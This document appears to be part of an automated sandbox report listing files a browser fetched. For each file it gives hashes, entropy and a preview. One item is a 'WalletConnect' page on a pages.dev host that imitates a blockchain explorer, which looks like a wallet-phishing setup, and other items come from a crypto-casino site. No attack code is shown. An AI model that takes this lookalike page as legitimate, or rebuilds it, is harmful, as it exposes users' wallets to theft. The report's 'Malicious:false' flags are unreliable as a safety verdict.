                                                                                                                                                                                                                                              SSDEEP:384:hYNg7KxJ8ix4Ra6m2M7le1Wp2SkWgmyHfV2pIVGhEB/FnC/mZGLUQv:hYyuxJuRD2740pxkWgmyHAnKBtnq2GLP
                                                                                                                                                                                                                                              MD5:24CFF29A3C60CB9BF8E4846451D20EEE
                                                                                                                                                                                                                                              SHA1:D01754D0B4405B0BBBAA462209708A3FEB062518
                                                                                                                                                                                                                                              SHA-256:F05A3F5959B767FFE6F4EF0E4126DF952A9102E8FE04490E11C858305B34A31C
                                                                                                                                                                                                                                              SHA-512:5399F81DB582D53B89B4CFF39842EDDB1FE60FB7038A029EAD3A66F548327951B3C23D86E7E4E83DFA7547E1C82567A77CA1BA463791CA221C2C1FBF8E56FBD1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:......JFIF.....H.H.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):8138
                                                                                                                                                                                                                                              Entropy (8bit):7.967611639245331
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:YVk3lSz24ekkk+DN/67FehM5eOSRyrFDI9buIA31Hq/:h3lSz2z2eQKRqDI4IoK
                                                                                                                                                                                                                                              MD5:A5519D1BB44AE898324C7C0FFFE58E61
                                                                                                                                                                                                                                              SHA1:5A427BE350806F64C0C7C584C034A90A7A76E8A7
                                                                                                                                                                                                                                              SHA-256:A0076A72ACE42A8994B6F39AE775300B4376925D0EC764C888E4B54875BE656E
                                                                                                                                                                                                                                              SHA-512:14FA54AD260D2575B2BBE5581C2965019351C88766347909302823AEF3DC5DFBBF7B4D5A96C4FDE900608DDBD90B06CDBB37D096DDBDCAB954C69DA356D3CD84
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://api.web3modal.com/getWalletImage/68e8063a-ff69-4941-3b40-af09e2fcd700
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8X..............ALPH......F........N%V.e.uorf..Y.{:......Kd.....F...EnFl.C{F....\..oFDL.(t..#.o.......>.f......:r....DQl.K^/b..!ym.EQ...,/..:P.........R.$..~...h.z....?.w..o..Kx9.v4...g......{k....[.....\._x9.j.d......N.Nyn.F....tk....M.(jDZl*y..m......iR4.GF.....H..=i..D......5S.....#H...u..=.?..Z..p.W.Aj=>GP...#..MT.k~B.u.b.....".6....+.na......+=.V..H.......H..)..L...A.n.@J6k.oA+.r.u.....-9.:}...\.F.~@.v..6.v U..dP>.1,....a..i. .n.._.Y....Ty}...L..KH...3...b.\ni.24k.1....myd"....sH.u......p.:T..#.?........7..E..H...$....]m.9.>x?#.&.+..@..........$|k.`.<Ky.4..!.[.........B...Ds..pr .......l1.....u...w.....#..%q....0....y@........+...=_.\P..Q..MC.....gx..l...3|...:>.....|...1D....q...Vx,@F4x......9a..@..'T...y...x..m.p.v.....).w"+..Ry....x.+..x!.`./.......Gy.l..x.6F[..M.G4.......w...0i.2...nX....z..^M.w..O?...W.q.7.l...!o'7..p..bn8t..,......OrC..v..Jn.....Fv.............s..^d.......?........?........?.......6........
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):10358
                                                                                                                                                                                                                                              Entropy (8bit):5.165131432739108
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:+LCajgTjQxXLRCj5y0GZYEdZo+gdZGHH0lE9f8WwWfxDrwdQ6PRjsPG87TtNgpDC:+qT2XL8jEHH2cUh+UPRMT7TtNgpe
                                                                                                                                                                                                                                              MD5:1CA5A00D1AE3C9D0F9C9A1E0F98716A4
                                                                                                                                                                                                                                              SHA1:C94AC718127976A4186C251E361CC504811A52C7
                                                                                                                                                                                                                                              SHA-256:E3AEE773520D6590CC7B41C515CA0CD9A3BF06B6613CFE34C40275D5BD7D220E
                                                                                                                                                                                                                                              SHA-512:72A68DB350C299368615C654C6693C2519AC9368D5BF04BD23248FCF7E7A26E688B0FD5D6C605A67FB2609ADCF51676D0CE6B058B5610703848AD90751C13D1E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:/**. * base64.ts. *. * Licensed under the BSD 3-Clause License.. * http://opensource.org/licenses/BSD-3-Clause. *. * References:. * http://en.wikipedia.org/wiki/Base64. *. * @author Dan Kogai (https://github.com/dankogai). */.const version = '3.7.2';./**. * @deprecated use lowercase `version`.. */.const VERSION = version;.const _hasatob = typeof atob === 'function';.const _hasbtoa = typeof btoa === 'function';.const _hasBuffer = typeof Buffer === 'function';.const _TD = typeof TextDecoder === 'function' ? new TextDecoder() : undefined;.const _TE = typeof TextEncoder === 'function' ? new TextEncoder() : undefined;.const b64ch = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';.const b64chs = Array.prototype.slice.call(b64ch);.const b64tab = ((a) => {. let tab = {};. a.forEach((c, i) => tab[c] = i);. return tab;.})(b64chs);.const b64re = /^(?:[A-Za-z\d+\/]{4})*?(?:[A-Za-z\d+\/]{2}(?:==)?|[A-Za-z\d+\/]{3}=?)?$/;.const _fromCC = String.fromCharCode.bind
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):26404
                                                                                                                                                                                                                                              Entropy (8bit):7.991272898133718
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:384:sCRM23gReyqeINAp2w6IEtKQV/wLCkGRwz/tTp9deivlr8mfnmv5HngGlQHsb:sCRr3kAApK8QNgCkVz/B1/qjgHE
                                                                                                                                                                                                                                              MD5:AC3A74C16B3D04ED6A3D6ED6B07D6AF5
                                                                                                                                                                                                                                              SHA1:135A03667BD3B27252FD8F7BD23805FD1B75835C
                                                                                                                                                                                                                                              SHA-256:78E15A1A6BBC2F0A64BC34C07A95E108716D5163207EF7EFD9B3E224822A20A6
                                                                                                                                                                                                                                              SHA-512:23494EDF60EEA08762AB469E0CBF4F6B55A6C98F69CE9A14BBA042F40F2A1878849D712BAE88F8D0122653D634A5F3E6F7D95705AFE1A07F251FFBD1874653B8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/crypto-casino-affpapa-2022-bYGRfjFE.png
                                                                                                                                                                                                                                              Preview:RIFF.g..WEBPVP8L.g../..=.....$I.Ef.....8.?...Q.4.F..*....|<. .....B.$....y....5.P.........m.[..Z.Y.uk..v}.)..~..K..C..H....X#.0`@@@...A. ........"...`...F$z0..%D,)I.$..7.N0.?<.........=......!..`...0.....0X.@.`.d.c......`$..9...V...Z.G.....5....5........U:\..Hv....[.."...."'b.-o.\ %?,.."UR>'f....`...r..e^..|#.U.`G.].#.2W9W..z..:.8d...(.......9.^w...}G...5.....s.......|..._.os..K.b....B...VY....n.}.....:..r...e.B.(.....Bi.}../..D..../%...!..... ...s%..a.m..J...m.."b....3.M..z.d^.$..u.jP..%|.om...m..Yjj...1%i...U..+P`Ph.7.{..z.?km...m5l#.N)F(.-.@jw.'.I.U..".3.K.x.|=.333.d.5.+.ir{u.s...X.;....H..h..:....Vj.....m...CC.U0.n.f.3.Y).u=.%.]x...Z.3.d;)..033.l.q...:..K..<...$...9...'.(/oL>}K.m.m[f.AS1@.G.F0.. ..lJ.....S...ZK..?-.V..W.Q...a21f.Zr..R#......g.P.v..._.....F.........Io..I.:.\..........,.v.I..8"......m.#Gg.A.e.e...C.%...:.jC.%C..pY.....~7............."...?,.V.X7LE.y.....e..m....5.o...i.`....E.!.L...$B...h...IE...#....$'N. ..f."qz.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1524
                                                                                                                                                                                                                                              Entropy (8bit):7.8529216799397155
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:cHnW4tCIKaCvgWKVEOnMnuRG8XoMXIJgmLrXxY56v0am3liKPQKAoZwuCuSLQr:cftMv/KVEOEQDbXcBK540aeoCCuWQr
                                                                                                                                                                                                                                              MD5:249A0DA079099541B70147A58DF60FD7
                                                                                                                                                                                                                                              SHA1:9EBFF48016F05E70C97E1F8B1E718BCA5AE04E8C
                                                                                                                                                                                                                                              SHA-256:214AE83A931305A203BF41A9F8FF546ABEFCEA310FCBABA41C9652E17D09A39C
                                                                                                                                                                                                                                              SHA-512:08E2C654CD7FEE5B082E9622652A72C4B309AF3E93235B8651AA1534844DBC54266E26C1B64ADBEE6BEFD2D6D538A13C923F7E46F0A890DD6BB64F3E8BBE1AC3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/coin/POL.black.png
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8L..../c.....0..............m.G.....C.m.......$E.3...2....$......4(se........P......@.A...Af'..C0.1.`....E..Q'.$Z.@ .....X....(..u..!....e......g.,.8.N.1....[6...{f.........(.T...].QJg1.MI..N.ZV..o..b.#=....n..<....m.6..Mi...;...E....!....Q....[...(.PN9-&.Qx5..[...zsl.m.m...'c.~.6y..........)9f.~...f.E...I..#....g.E..<...8+..t...$T.$rC&R.r..&s..BRIm..G..UEuv$G.j.4...%.E.$.+0......H..).c+.!,...Ju...R.bS..j..r...TDq..T....7..c..M.k.bM.7.......D...=.rS.....&3..q.. .......=....CT...q.C.....=..P".mc.............xu..9.C.xZ.....&..z_|".Ed.../l...:..~...."..lj.`...Md...y.......;........D.O....K.>q;.t.&..J_T..k)....`.&?.5...B...B=.jI..^.c...../o...G%Y.....0.=..q.og..n.Z.H..-:.A.....V\..I..Y.r..Q;.$z..9...xZ....C.@.r .P., ........q.<....z^.l.ZL.n.xO3.....G..6Uw....f...<.k...nLo..A.(/B..Z.[.aLl..F(.GF.&SI..p.3q....Y.d.) xwW..z....$(].p.....C.M...n.B $.C.[Pn.......F....e.^B.._0._.Bl.....}).<.......M?l.6.b..~....`...%.....; j....e..o.c...
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 120 x 48, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):962
                                                                                                                                                                                                                                              Entropy (8bit):7.475405833318208
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:/XeqQi2tWlKXr0hRwHAwkWAALtVqF8AT+u/UR9ryX3vIL:/XHQFWwXC8WXt+u/UX+/0
                                                                                                                                                                                                                                              MD5:95CE14C6DA35C8423FD6DD89E60D26D5
                                                                                                                                                                                                                                              SHA1:1FA44C39966E118D170BC8A3C7EF88982A960D3F
                                                                                                                                                                                                                                              SHA-256:C123480EF4D5AC716502D942724ECDC16C561B0A9EFFD6402E141DD58E97ACCA
                                                                                                                                                                                                                                              SHA-512:895F06A065E58EF8334C9EF6E9842DD78889C75A488931E3E7B210AD592706ECB87C5F1F67FD44E4F843CA51D524C0F50AEB377FCF205D057F96B3977EACE9F0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...x...0......N.....sRGB.........gAMA......a....rPLTE..................................................................................................................n......&tRNS.@.....`....o_.0.......PppP0 `... ]..Y....IDATx...z.0.E...yK.=..-..+.....c._............x..Q..ySD......t"..$....3rVtb9).....B0b....-X5....C..z+1!..c...,.#.. ..H....G....M.]..w.a."..UrX+j...B.N.qG...z.(.o.Xdi.7...A...*b..XS....,~...~.....V.'......r..0p..`Xo`.>F.R.v\...6....._\.Z....c....f,.a)xq.:.....5.qJH.nD.&.....v.I4A..+....+..k...b...o.*K..;..X..s..|...8G.q...).c.U.=0.......V.*..P...i..q ..^...?.A...`w[..ET.Y.l.z...^.U.....I..l...3.-E.u.90K...H..CU.v....1.Y.w.qP.FQ.............}j%6q.x...%.\.....F&..u1.E..w.....t..o.....<..I._rsC|.f.9O.V...{...".......P.m."0b......+..x....VL...@QA<\.B.H.#F...a=.r,..^u}..Rj.].^V..<..B\.%.c.....Y.7..d.?..2...@..K..o^.......H...m.y.pbV.>.#..S..r..nO....6...%2.4h......IEND.B`.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):10358
                                                                                                                                                                                                                                              Entropy (8bit):5.165131432739108
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:+LCajgTjQxXLRCj5y0GZYEdZo+gdZGHH0lE9f8WwWfxDrwdQ6PRjsPG87TtNgpDC:+qT2XL8jEHH2cUh+UPRMT7TtNgpe
                                                                                                                                                                                                                                              MD5:1CA5A00D1AE3C9D0F9C9A1E0F98716A4
                                                                                                                                                                                                                                              SHA1:C94AC718127976A4186C251E361CC504811A52C7
                                                                                                                                                                                                                                              SHA-256:E3AEE773520D6590CC7B41C515CA0CD9A3BF06B6613CFE34C40275D5BD7D220E
                                                                                                                                                                                                                                              SHA-512:72A68DB350C299368615C654C6693C2519AC9368D5BF04BD23248FCF7E7A26E688B0FD5D6C605A67FB2609ADCF51676D0CE6B058B5610703848AD90751C13D1E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://cdn.jsdelivr.net/npm/js-base64@3.7.2/base64.mjs
                                                                                                                                                                                                                                              Preview:/**. * base64.ts. *. * Licensed under the BSD 3-Clause License.. * http://opensource.org/licenses/BSD-3-Clause. *. * References:. * http://en.wikipedia.org/wiki/Base64. *. * @author Dan Kogai (https://github.com/dankogai). */.const version = '3.7.2';./**. * @deprecated use lowercase `version`.. */.const VERSION = version;.const _hasatob = typeof atob === 'function';.const _hasbtoa = typeof btoa === 'function';.const _hasBuffer = typeof Buffer === 'function';.const _TD = typeof TextDecoder === 'function' ? new TextDecoder() : undefined;.const _TE = typeof TextEncoder === 'function' ? new TextEncoder() : undefined;.const b64ch = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';.const b64chs = Array.prototype.slice.call(b64ch);.const b64tab = ((a) => {. let tab = {};. a.forEach((c, i) => tab[c] = i);. return tab;.})(b64chs);.const b64re = /^(?:[A-Za-z\d+\/]{4})*?(?:[A-Za-z\d+\/]{2}(?:==)?|[A-Za-z\d+\/]{3}=?)?$/;.const _fromCC = String.fromCharCode.bind
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (460)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1897
                                                                                                                                                                                                                                              Entropy (8bit):5.15749049535416
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:sQJiG1LdS2gpAIORLPpKMLncIR6jx+o4GJLY+5ej/HzJaoGZD13cOYrdO9bS:sQb9Y2KpOlPpDwrx+e5ebEZh3cOYrdOM
                                                                                                                                                                                                                                              MD5:9B90BE693B3DC592F61DE5E429D7F68F
                                                                                                                                                                                                                                              SHA1:9F03EA95DF470F3C2A7E7F11922A4A2A9F50D941
                                                                                                                                                                                                                                              SHA-256:819CFB86F8E886296211F58849C55AF3CD04A5687D7096BB4F198458DD9813DA
                                                                                                                                                                                                                                              SHA-512:23D4377C21AD048B8F38F8AC5E23FC4D857BD63D667EFED43950F95D411A4B9229195BCA3806DEBF45B0A422A99D43C84113BC60F3E71B147C2FEA62FAD460F1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:(function(){var randseed=new Array(4);function seedrand(seed){for(var i=0;i<randseed.length;i++){randseed[i]=0;}.for(var i=0;i<seed.length;i++){randseed[i%4]=((randseed[i%4]<<5)-randseed[i%4])+seed.charCodeAt(i);}}.function rand(){var t=randseed[0]^(randseed[0]<<11);randseed[0]=randseed[1];randseed[1]=randseed[2];randseed[2]=randseed[3];randseed[3]=(randseed[3]^(randseed[3]>>19)^t^(t>>8));return(randseed[3]>>>0)/((1<<31)>>>0);}.function createColor(){var h=Math.floor(rand()*360);var s=((rand()*60)+40)+'%';var l=((rand()+rand()+rand()+rand())*25)+'%';var color='hsl('+h+','+s+','+l+')';return color;}.function createImageData(size){var width=size;var height=size;var dataWidth=Math.ceil(width/2);var mirrorWidth=width-dataWidth;var data=[];for(var y=0;y<height;y++){var row=[];for(var x=0;x<dataWidth;x++){row[x]=Math.floor(rand()*2.3);}.var r=row.slice(0,mirrorWidth);r.reverse();row=row.concat(r);for(var i=0;i<row.length;i++){data.push(row[i]);}}.return data;}.function createCanvas(imageData
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (6687)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):6688
                                                                                                                                                                                                                                              Entropy (8bit):5.720132483751706
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:k25t3tyHm6+46tWGETbAPxvvp0p0p0pXaAydS6zz0rc29+pAiff:h5t3tyHmX4VGETsJfnUvkAs
                                                                                                                                                                                                                                              MD5:CEB1D5324E381E5B689D5F3241E43D11
                                                                                                                                                                                                                                              SHA1:9C44DE4117C62B2C491C371B11083122AD5D82D6
                                                                                                                                                                                                                                              SHA-256:B6ECC59192493C170E1BF0C577FCF111596DE7BE651F7FA1C636ADD71C11B1DE
                                                                                                                                                                                                                                              SHA-512:C19BA3C9E20ED7770414E6288C57D4C8B120310EC17A30557329EF0AFD7EF9CAF5BA9AFA900818D7DA15703D2C76BB40E36CE0C920B1C3F16EBAC3A34BE5F4D6
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{d as M,c as l,u,k as w,e as B,s as g,t as k,r as T}from"./web-13cf6287.js";import{k as z,v as J,c as Q,h as D,M as A,o as y,a as G,u as N,w as W,d as K,x as L}from"./solid-js-38561dfe.js";import{a8 as R,e as b,u as Y,h as q,t as I}from"./manifest-51a3674f.js";import{g as F}from"./index-3fd48be3.js";import{h as $}from"./http-f4555b94.js";import{t as j}from"./toast-unhandle-error-992739c6.js";const C=z(()=>{const o=R("/game-support").connect();return J(t=>{const e=R();return o.on("bonus-crocodile",e.decodeBind(n=>{t(n)},"json")),()=>{o.off("bonus-crocodile"),o.disconnect()}})}),V="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACQAAAAkCAMAAADW3miqAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAACoUExURUdwTPW0CPm9B/a2B//MBv7JBvm9CfOyBvvEDP/MBv/NB/CpBvCoB/CpBv/LBv/NBv/FT/CoB/i8Bu+oBvCsB++oB//OB//OB//NB/+9C//MM++oBv+qK/+zBv/MBv/////LBu+oBv7GBv+2B//ABv+5Bv/KBve7BvrCBv++K//kpv/Vdf/qu//otf+9Bv/FQP/13v/ah/+4F//flP/x0v/KU//DO//564N2FJwAAAAddFJOUwA7Ikbd7zP+FPeU6JWjwqUDYeb32L5sUIL4BXQGxzxp6QAAAcJJR
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):71
                                                                                                                                                                                                                                              Entropy (8bit):4.8011752045489855
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:JS4vILCzRIB2DJCyzAxZYevn:DIO9IB2DJCysxZzv
                                                                                                                                                                                                                                              MD5:9A5A5A6DFD8AD7CDE965EE442363AA29
                                                                                                                                                                                                                                              SHA1:13C5A93B37D0A7A4E4B5264CBADB88E69CBF06E2
                                                                                                                                                                                                                                              SHA-256:FE95E60293426828CB30C69A7C59816FC20B25A1B95F70FD88B5B41FF6CE3838
                                                                                                                                                                                                                                              SHA-512:A9DA2B9C2BA8025A936398EC8E3DCA2EAEB6F7667A00379F248B4321087BF0F9E1B707A6A63ECE71462FE9BE4D979989419D8B8343896F50EDA608BD8E0FDED4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/http-f4555b94.js
                                                                                                                                                                                                                                              Preview:import{W as t}from"./manifest-51a3674f.js";const p=t();export{p as h};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/style.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
